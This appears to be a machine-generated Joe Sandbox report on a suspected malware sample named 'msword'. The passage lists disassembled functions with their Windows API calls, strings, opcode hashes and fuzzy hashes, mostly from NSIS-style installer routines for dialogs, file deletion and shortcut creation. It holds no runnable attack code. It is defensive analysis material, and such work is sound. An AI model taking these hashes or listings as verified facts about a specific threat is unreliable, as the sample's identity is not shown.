Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

@, xrefs: 00404B90
N, xrefs: 00404C06
M, xrefs: 00404B43
, xrefs: 00404F39

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

@rD, xrefs: 00404610
@%F, xrefs: 00404674
A, xrefs: 00404636
82D, xrefs: 004046DB

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

%s: failed opening file "%s", xrefs: 00406F0C
name, xrefs: 00406FBF
GetTTFNameString, xrefs: 00406F07

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
\*.*, xrefs: 00406D03
Delete: DeleteFile("%s"), xrefs: 00406DBC
Delete: DeleteFile failed("%s"), xrefs: 00406DFD
RMDir: RemoveDirectory("%s"), xrefs: 00406E6F

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
